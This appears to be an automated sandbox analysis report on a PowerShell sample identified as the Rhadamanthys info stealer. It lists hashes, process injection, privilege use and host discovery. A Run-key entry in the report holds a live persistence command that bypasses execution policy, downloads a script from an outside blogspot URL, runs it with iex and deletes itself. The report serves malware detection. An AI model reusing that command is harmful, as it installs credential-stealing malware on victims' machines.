Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
29-11-2024 02:09
Static task
static1
Behavioral task
behavioral1
Sample
19bad3275a0cd1caa9a8eb75d496eaa897ca4c7a07aeab78ab3309d91b4f64fd.ps1
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
19bad3275a0cd1caa9a8eb75d496eaa897ca4c7a07aeab78ab3309d91b4f64fd.ps1
Resource
win10v2004-20241007-en
General
-
Target
19bad3275a0cd1caa9a8eb75d496eaa897ca4c7a07aeab78ab3309d91b4f64fd.ps1
-
Size
2.5MB
-
MD5
7c2e9489af70d3967960dbe1cb87f4ae
-
SHA1
bcade1f31f869e58848c09cd022652b612580daf
-
SHA256
19bad3275a0cd1caa9a8eb75d496eaa897ca4c7a07aeab78ab3309d91b4f64fd
-
SHA512
9d910243fa5847046dd6793465d5b84c2e1f72d7d42acd5e52860f9bd3545b25e981322a312930a192dd43bafe3c5679657699a78bc98f48b4b6a2aec447a374
-
SSDEEP
1536:7Ic2Lo8L+bTXe26vgn00oR/S7rV521Gd9AcaMorjFN4UAjtbTliBdIpjXClBEv7l:ZD1
Malware Config
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Rhadamanthys family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 4648 created 2968 4648 RegSvcs.exe 50 PID 4460 created 2968 4460 RegSvcs.exe 50 -
Deletes itself 1 IoCs
pid Process 4860 powershell.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Defenderlt-101 = "mshta \"javascript:mh=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hoot11nov.blogspot.com////loka.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(mh[2])[mh[0]](mh[1], 0, true);close();js=new ActiveXObject('Scripting.FileSystemObject');js.DeleteFile(WScript.ScriptFullName);\"" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Defenderl-109 = "schtasks /run /tn Defenderl-109" powershell.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 4860 set thread context of 4460 4860 powershell.exe 93 PID 4860 set thread context of 4648 4860 powershell.exe 94 PID 4860 set thread context of 5036 4860 powershell.exe 95 PID 4860 set thread context of 4012 4860 powershell.exe 96 PID 4860 set thread context of 1736 4860 powershell.exe 97 PID 4860 set thread context of 4968 4860 powershell.exe 98 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp dw20.exe -
pid Process 4860 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Msbuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language openwith.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Msbuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language openwith.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe -
Suspicious behavior: EnumeratesProcesses 26 IoCs
pid Process 4860 powershell.exe 4860 powershell.exe 4860 powershell.exe 4860 powershell.exe 4860 powershell.exe 4860 powershell.exe 4648 RegSvcs.exe 4648 RegSvcs.exe 4460 RegSvcs.exe 4460 RegSvcs.exe 4240 openwith.exe 4240 openwith.exe 4240 openwith.exe 4240 openwith.exe 4860 powershell.exe 4860 powershell.exe 4860 powershell.exe 4860 powershell.exe 4860 powershell.exe 4860 powershell.exe 4860 powershell.exe 4860 powershell.exe 4860 powershell.exe 4860 powershell.exe 4860 powershell.exe 4860 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4860 powershell.exe Token: SeRestorePrivilege 456 dw20.exe Token: SeBackupPrivilege 456 dw20.exe Token: SeBackupPrivilege 456 dw20.exe Token: SeBackupPrivilege 1600 dw20.exe Token: SeBackupPrivilege 1600 dw20.exe Token: SeBackupPrivilege 64 dw20.exe Token: SeBackupPrivilege 64 dw20.exe Token: SeBackupPrivilege 2948 dw20.exe Token: SeBackupPrivilege 2948 dw20.exe Token: SeBackupPrivilege 456 dw20.exe Token: SeBackupPrivilege 456 dw20.exe Token: SeIncreaseQuotaPrivilege 4860 powershell.exe Token: SeSecurityPrivilege 4860 powershell.exe Token: SeTakeOwnershipPrivilege 4860 powershell.exe Token: SeLoadDriverPrivilege 4860 powershell.exe Token: SeSystemProfilePrivilege 4860 powershell.exe Token: SeSystemtimePrivilege 4860 powershell.exe Token: SeProfSingleProcessPrivilege 4860 powershell.exe Token: SeIncBasePriorityPrivilege 4860 powershell.exe Token: SeCreatePagefilePrivilege 4860 powershell.exe Token: SeBackupPrivilege 4860 powershell.exe Token: SeRestorePrivilege 4860 powershell.exe Token: SeShutdownPrivilege 4860 powershell.exe Token: SeDebugPrivilege 4860 powershell.exe Token: SeSystemEnvironmentPrivilege 4860 powershell.exe Token: SeRemoteShutdownPrivilege 4860 powershell.exe Token: SeUndockPrivilege 4860 powershell.exe Token: SeManageVolumePrivilege 4860 powershell.exe Token: 33 4860 powershell.exe Token: 34 4860 powershell.exe Token: 35 4860 powershell.exe Token: 36 4860 powershell.exe Token: SeIncreaseQuotaPrivilege 4860 powershell.exe Token: SeSecurityPrivilege 4860 powershell.exe Token: SeTakeOwnershipPrivilege 4860 powershell.exe Token: SeLoadDriverPrivilege 4860 powershell.exe Token: SeSystemProfilePrivilege 4860 powershell.exe Token: SeSystemtimePrivilege 4860 powershell.exe Token: SeProfSingleProcessPrivilege 4860 powershell.exe Token: SeIncBasePriorityPrivilege 4860 powershell.exe Token: SeCreatePagefilePrivilege 4860 powershell.exe Token: SeBackupPrivilege 4860 powershell.exe Token: SeRestorePrivilege 4860 powershell.exe Token: SeShutdownPrivilege 4860 powershell.exe Token: SeDebugPrivilege 4860 powershell.exe Token: SeSystemEnvironmentPrivilege 4860 powershell.exe Token: SeRemoteShutdownPrivilege 4860 powershell.exe Token: SeUndockPrivilege 4860 powershell.exe Token: SeManageVolumePrivilege 4860 powershell.exe Token: 33 4860 powershell.exe Token: 34 4860 powershell.exe Token: 35 4860 powershell.exe Token: 36 4860 powershell.exe Token: SeIncreaseQuotaPrivilege 4860 powershell.exe Token: SeSecurityPrivilege 4860 powershell.exe Token: SeTakeOwnershipPrivilege 4860 powershell.exe Token: SeLoadDriverPrivilege 4860 powershell.exe Token: SeSystemProfilePrivilege 4860 powershell.exe Token: SeSystemtimePrivilege 4860 powershell.exe Token: SeProfSingleProcessPrivilege 4860 powershell.exe Token: SeIncBasePriorityPrivilege 4860 powershell.exe Token: SeCreatePagefilePrivilege 4860 powershell.exe Token: SeBackupPrivilege 4860 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4860 wrote to memory of 4460 4860 powershell.exe 93 PID 4860 wrote to memory of 4460 4860 powershell.exe 93 PID 4860 wrote to memory of 4460 4860 powershell.exe 93 PID 4860 wrote to memory of 4460 4860 powershell.exe 93 PID 4860 wrote to memory of 4460 4860 powershell.exe 93 PID 4860 wrote to memory of 4460 4860 powershell.exe 93 PID 4860 wrote to memory of 4460 4860 powershell.exe 93 PID 4860 wrote to memory of 4460 4860 powershell.exe 93 PID 4860 wrote to memory of 4648 4860 powershell.exe 94 PID 4860 wrote to memory of 4648 4860 powershell.exe 94 PID 4860 wrote to memory of 4648 4860 powershell.exe 94 PID 4860 wrote to memory of 4648 4860 powershell.exe 94 PID 4860 wrote to memory of 4648 4860 powershell.exe 94 PID 4860 wrote to memory of 4648 4860 powershell.exe 94 PID 4860 wrote to memory of 4648 4860 powershell.exe 94 PID 4860 wrote to memory of 4648 4860 powershell.exe 94 PID 4860 wrote to memory of 5036 4860 powershell.exe 95 PID 4860 wrote to memory of 5036 4860 powershell.exe 95 PID 4860 wrote to memory of 5036 4860 powershell.exe 95 PID 4860 wrote to memory of 5036 4860 powershell.exe 95 PID 4860 wrote to memory of 5036 4860 powershell.exe 95 PID 4860 wrote to memory of 5036 4860 powershell.exe 95 PID 4860 wrote to memory of 5036 4860 powershell.exe 95 PID 4860 wrote to memory of 5036 4860 powershell.exe 95 PID 4860 wrote to memory of 4012 4860 powershell.exe 96 PID 4860 wrote to memory of 4012 4860 powershell.exe 96 PID 4860 wrote to memory of 4012 4860 powershell.exe 96 PID 4860 wrote to memory of 4012 4860 powershell.exe 96 PID 4860 wrote to memory of 4012 4860 powershell.exe 96 PID 4860 wrote to memory of 4012 4860 powershell.exe 96 PID 4860 wrote to memory of 4012 4860 powershell.exe 96 PID 4860 wrote to memory of 4012 4860 powershell.exe 96 PID 4860 wrote to memory of 1736 4860 powershell.exe 97 PID 4860 wrote to memory of 1736 4860 powershell.exe 97 PID 4860 wrote to memory of 1736 4860 powershell.exe 97 PID 4860 wrote to memory of 1736 4860 powershell.exe 97 PID 4860 wrote to memory of 1736 4860 powershell.exe 97 PID 4860 wrote to memory of 1736 4860 powershell.exe 97 PID 4860 wrote to memory of 1736 4860 powershell.exe 97 PID 4860 wrote to memory of 1736 4860 powershell.exe 97 PID 4860 wrote to memory of 4968 4860 powershell.exe 98 PID 4860 wrote to memory of 4968 4860 powershell.exe 98 PID 4860 wrote to memory of 4968 4860 powershell.exe 98 PID 4860 wrote to memory of 4968 4860 powershell.exe 98 PID 4860 wrote to memory of 4968 4860 powershell.exe 98 PID 4860 wrote to memory of 4968 4860 powershell.exe 98 PID 4860 wrote to memory of 4968 4860 powershell.exe 98 PID 4860 wrote to memory of 4968 4860 powershell.exe 98 PID 4968 wrote to memory of 2948 4968 Msbuild.exe 99 PID 4968 wrote to memory of 2948 4968 Msbuild.exe 99 PID 4968 wrote to memory of 2948 4968 Msbuild.exe 99 PID 5036 wrote to memory of 456 5036 RegSvcs.exe 101 PID 5036 wrote to memory of 456 5036 RegSvcs.exe 101 PID 5036 wrote to memory of 456 5036 RegSvcs.exe 101 PID 1736 wrote to memory of 1600 1736 Msbuild.exe 100 PID 1736 wrote to memory of 1600 1736 Msbuild.exe 100 PID 1736 wrote to memory of 1600 1736 Msbuild.exe 100 PID 4012 wrote to memory of 64 4012 RegSvcs.exe 102 PID 4012 wrote to memory of 64 4012 RegSvcs.exe 102 PID 4012 wrote to memory of 64 4012 RegSvcs.exe 102 PID 4648 wrote to memory of 4240 4648 RegSvcs.exe 105 PID 4648 wrote to memory of 4240 4648 RegSvcs.exe 105 PID 4648 wrote to memory of 4240 4648 RegSvcs.exe 105 PID 4648 wrote to memory of 4240 4648 RegSvcs.exe 105
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2968
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4240
-
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\19bad3275a0cd1caa9a8eb75d496eaa897ca4c7a07aeab78ab3309d91b4f64fd.ps11⤵
- Deletes itself
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4860 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4460
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4648
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 8963⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:456
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4012 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 9123⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:64
-
-
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7803⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:1600
-
-
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4968 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7803⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:2948
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD5e441762378d8ddf4e099926c5a0006e9
SHA1bd91f85d453abe070acf790468b6f91785b855c0
SHA256a52771013cc279fb104941ca27835cb95b9a9c8fecd9734f086569b28bd2cee9
SHA5125cc7003e34c4123021bc8e3d4c3dec920ad51d4e1c0f3276e3b145d2a67d8876b7a769f4854febfd36024bf2b2d61b3d7b4868af1a229b57e3da4d2d5ce4d687
-
Filesize
315B
MD569acc92e6df5c35cf75eded8f61ddeaa
SHA1b405090a2f92f85490705dcf77a6461ad85e7e20
SHA256da3437f337aca0e1f8d7b187abcd9112d88beddde8ab8ae5aa8a8ab91b6e9698
SHA5129b83a6ef14372d9e229beb69c1b1ede6f348fb51925205f99f705808db6331c5aab32bd57fc786c61647cbb94f7e4bd236dc9f4fc26be4c1ffc7a35e7619a508
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82